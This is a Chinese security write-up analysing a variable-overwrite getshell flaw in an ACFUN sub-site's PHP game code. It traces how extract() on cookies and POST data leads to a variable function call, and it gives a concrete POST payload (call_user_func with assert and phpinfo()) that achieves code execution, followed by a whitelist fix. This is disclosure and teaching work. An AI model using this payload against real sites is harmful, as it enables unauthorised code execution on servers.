ACFUN分站再次GETSHELL变量覆盖漏洞分析与利用
2013-06-28 09:28:06           

常在河边走哪有不湿鞋?把请求参数 extract() 进全局作用域、再靠全局变量"现取现用",早晚是要出问题的..

 直接进入正题:

\include\common.inc.php -Line12

require GAME_ROOT.'./include/global.func.php';
error_reporting(E_ALL);
set_error_handler('gameerrorhandler');
// Read once here; gstrfilter() consults $GLOBALS['magic_quotes_gpc'] to decide
// whether to stripslashes(). (get_magic_quotes_gpc() no longer exists in PHP 8.)
$magic_quotes_gpc = get_magic_quotes_gpc();
// VULNERABLE: extract() turns every cookie and POST field into a global variable
// (default EXTR_OVERWRITE, so a POST field replaces a cookie of the same name).
// gstrfilter() only strips quotes/backslashes and HTML-escapes the value; it does
// not restrict *which* variables get created. Any global that later code reads
// without assigning first (e.g. $mode, $command, $nteamID, $nteamPass in
// command.php) is therefore fully attacker-controlled.
extract(gstrfilter($_COOKIE));
extract(gstrfilter($_POST));
$_GET = gstrfilter($_GET);
$_REQUEST = gstrfilter($_REQUEST);
$_FILES = gstrfilter($_FILES);// huh? (even upload metadata is run through the string filter)

// config.inc.php is required only after the extract() calls, so request data
// cannot overwrite variables that config.inc.php itself assigns. That is the
// only protection this ordering gives: variables config.inc.php never touches
// remain whatever the request said.
require GAME_ROOT.'./config.inc.php';


config.inc.php 在 extract() 之后才引入,使得 POST/COOKIE 无法覆盖 config 中赋值的变量。但这只保护 config.inc.php 本身赋过值的变量;凡是后面代码只读、不先赋值的变量(例如 $mode、$command、$nteamID、$nteamPass),依然完全由请求控制。

 

gstrfilter过滤:

\include\global.inc.php -Line48


 

/**
 * Recursively "sanitise" a request value: drop single quotes and backslashes,
 * then HTML-escape & < > " (ENT_COMPAT leaves ' alone, but it is already gone).
 *
 * Scope of what this does: it only removes the two characters used to break
 * out of quote-delimited SQL/HTML strings and escapes HTML metacharacters.
 * Letters, digits, parentheses and underscores pass through untouched, so a
 * value such as "assert" or "phpinfo()" survives intact; it gives no protection
 * when the value is later used as a function name or in an unquoted SQL
 * context. Array keys are not filtered, only leaf values.
 *
 * @param mixed $str  scalar or (nested) array taken from $_GET/$_POST/$_COOKIE
 * @return mixed      same shape as the input with every leaf filtered
 */
function gstrfilter($str) {
 if(is_array($str)) {
  // array_map() with a single array argument preserves the original keys.
  return array_map('gstrfilter', $str);
 }
 // Undo magic_quotes escaping first so the backslash strip below sees raw input.
 if(!empty($GLOBALS['magic_quotes_gpc'])) {
  $str = stripslashes($str);
 }
 // Remove rather than escape: first every ' then every \ (same order as before).
 $str = str_replace(array("'", "\\"), "", $str);
 // Escape & < > and "; ENT_COMPAT does not touch single quotes.
 return htmlspecialchars($str, ENT_COMPAT);
}

 

重要变量靠"现取现用"再加上过滤,就可以在一定程度上避免因为偷懒拼接 sqlquery 产生的问题了..至少在大部分代码中没问题..但要注意这个过滤只删掉了 ' 和 \ 并做了 HTML 转义:字母、数字、括号、下划线原样保留,数字型 SQL 上下文并没有被保护,更不会限制把值当作函数名来调用。

 

 

关键在这里:

\command.php -Line3


 

// common.inc.php is where extract($_COOKIE) / extract($_POST) runs, so by the
// time the rest of this file executes every request field already exists as a
// global variable.
require './include/common.inc.php';
//$t_s=getmicrotime();
//require_once GAME_ROOT.'./include/JSON.php';
require GAME_ROOT.'./include/game.func.php';
// NOTE(review): config() and $gamecfg are presumably defined by the includes
// above (config.inc.php / game.func.php) -- not visible in this excerpt.
require config('combatcfg',$gamecfg);

\command.php -Line92


// Command dispatch. $mode, $command, $action, $sp_cmd, $teamcmd, $nteamID,
// $nteamPass, ... are read here but never assigned in this file beforehand:
// they are the globals created by extract(gstrfilter($_COOKIE/$_POST)) in
// common.inc.php, i.e. the request decides their values.
if($mode !== 'combat' && $mode !== 'corpse' && strpos($action,'pacorpse')===false && $mode !== 'senditem'){
   $action = '';
  }
  if($command == 'menu') {
   $mode = 'command';
   $action = '';
  } elseif($mode == 'command') {
   if($command == 'move') {
    include_once GAME_ROOT.'./include/game/search.func.php';
    move($moveto);
    if($coldtimeon){$cmdcdtime=$movecoldtime;}
   } elseif($command == 'search') {
    include_once GAME_ROOT.'./include/game/search.func.php';
    search();
    if($coldtimeon){$cmdcdtime=$searchcoldtime;}
   } elseif(strpos($command,'itm') === 0) {
    include_once GAME_ROOT.'./include/game/item.func.php';
    $item = substr($command,3);
    itemuse($item);
    if($coldtimeon){$cmdcdtime=$itemusecoldtime;}
   } elseif(strpos($command,'rest') === 0) {
    if($command=='rest3' && !in_array($pls,$hospitals)){
     $log .= '<span class="yellow">你所在的位置并非医院,不能静养!</span><br>';
    }else{
     $state = substr($command,4,1);
     $mode = 'rest';
    }
   } elseif($command == 'itemmain') {
    // $mode copied straight from a request variable (no check against a known list).
    $mode = $itemcmd;
   } elseif($command == 'song') {
    $sname=trim(trim($art,'【'),'】');
    include_once GAME_ROOT.'./include/game/song.inc.php';
    //$log.=$sname;
    sing($sname);
   }elseif($command == 'sync') {
    include_once GAME_ROOT.'./include/game/special.func.php';
    syncro($sp_cmd);
    $mode='command';
   }elseif($command == 'special') {
    if($sp_cmd == 'sp_word'){
     include_once GAME_ROOT.'./include/game/special.func.php';
     getword();
     $mode = $sp_cmd;
    }elseif($sp_cmd == 'sp_adtsk'){
     include_once GAME_ROOT.'./include/game/special.func.php';
     adtsk();
     $mode = 'command';
    }elseif($sp_cmd == 'sp_pbomb'){
     $mode = 'sp_pbomb';
    }elseif($sp_cmd == 'sp_weapon'){
     include_once GAME_ROOT.'./include/game/special.func.php';
     weaponswap();
     $mode = 'command';
     if($coldtimeon){$cmdcdtime=$weaponswapcoldtime;}
    }elseif($sp_cmd == 'oneonone'){
     $mode='oneonone';
    }elseif($sp_cmd == 'sp_skpts'){
     include_once GAME_ROOT.'./include/game/clubskills.func.php';
     calcskills($skarr);
     $p12[1]=1; $p12[2]=2;
     $mode='sp_skpts';
    }else{
     // Fallback: any unrecognised sp_cmd becomes the next $mode verbatim.
     $mode = $sp_cmd;
    }
    
   } elseif($command == 'team') {
    include_once GAME_ROOT.'./include/game/team.func.php';
    if($teamcmd == 'teamquit') {    
     teamquit();
    } else{
     teamcheck();
    }
   }
   // ... part of the $mode == 'command' branch omitted in the writeup; skip to the final dispatch ...
  } elseif($mode == 'senditem') {
   include_once GAME_ROOT.'./include/game/battle.func.php';
   senditem();
  } elseif($mode == 'combat') {
   include_once GAME_ROOT.'./include/game/combat.func.php';
   combat(1,$command);
  } elseif($mode == 'rest') {
   include_once GAME_ROOT.'./include/state.func.php';
   rest($command);
//  } elseif($mode == 'chgpassword') {
//   include_once GAME_ROOT.'./include/game/special.func.php';
//   chgpassword($oldpswd,$newpswd,$newpswd2);
//  } elseif($mode == 'chgword') {
//   include_once GAME_ROOT.'./include/game/special.func.php';
//   chgword($newmotto,$newlastword,$newkillmsg);
  } elseif($mode == 'corpse') {
   include_once GAME_ROOT.'./include/game/itemmain.func.php';
   getcorpse($command);
  } elseif($mode == 'team') {
   include_once GAME_ROOT.'./include/game/team.func.php';
   // VULNERABLE: variable function call. Reached with POST mode=team and any
   // command other than 'menu'. $command is the function *name* and
   // $nteamID/$nteamPass are its two arguments, all three taken from the
   // request with no whitelist; the intended callees are teammake()/teamjoin()
   // from team.func.php. gstrfilter() only strips ' and \ and HTML-escapes, so a
   // bare identifier such as call_user_func / assert passes through untouched.
   $command($nteamID,$nteamPass);//<---------- arbitrary callable with two attacker-controlled arguments
  }

 

team.func.php 中存在两个方法:建立队伍 function teammake($tID,$tPass) 和加入队伍 function teamjoin($tID,$tPass)。command.php 直接把 $command 当可变函数名调用来在二者之间选择,却没有做任何白名单校验;结合前面 common.inc.php 里的 extract(gstrfilter($_POST)),$command、$nteamID、$nteamPass 三个变量都直接来自 POST,等于让攻击者指定任意函数名并控制它的两个参数——感觉像是程序员偷懒时忘记了上面的 extract 解包?

 

 


构造请求:

$_POST['mode']='team',

$_POST['command']='call_user_func',

$_POST['nteamID']='assert',

$_POST['nteamPass']='phpinfo()'。

这样 $command($nteamID,$nteamPass) 实际执行的就是 call_user_func('assert','phpinfo()')。之所以要绕一层 call_user_func、把要执行的代码放在参数里,是因为 gstrfilter 会删掉单引号和反斜杠,payload 中无法直接写字符串字面量;而 'call_user_func'、'assert'、'phpinfo()' 都不含被过滤的字符,原样通过。注意 assert() 对字符串参数求值的行为只存在于 PHP 7.x 及更早版本(PHP 8 已移除),在新版本上需另择可调用名。


 

 修复方案:


别偷懒..具体来说:command.php 里不要把 $command 直接当函数名调用,应先按白名单判断,例如 `if ($command === 'teammake' || $command === 'teamjoin') { $command($nteamID, $nteamPass); }`,或者干脆写成显式的 if/else 分别调用 teammake()/teamjoin();根本上则应去掉 common.inc.php 里对 $_COOKIE/$_POST 的 extract(),改为在用到的地方显式读取 $_POST['xxx'],避免请求参数直接变成全局变量。
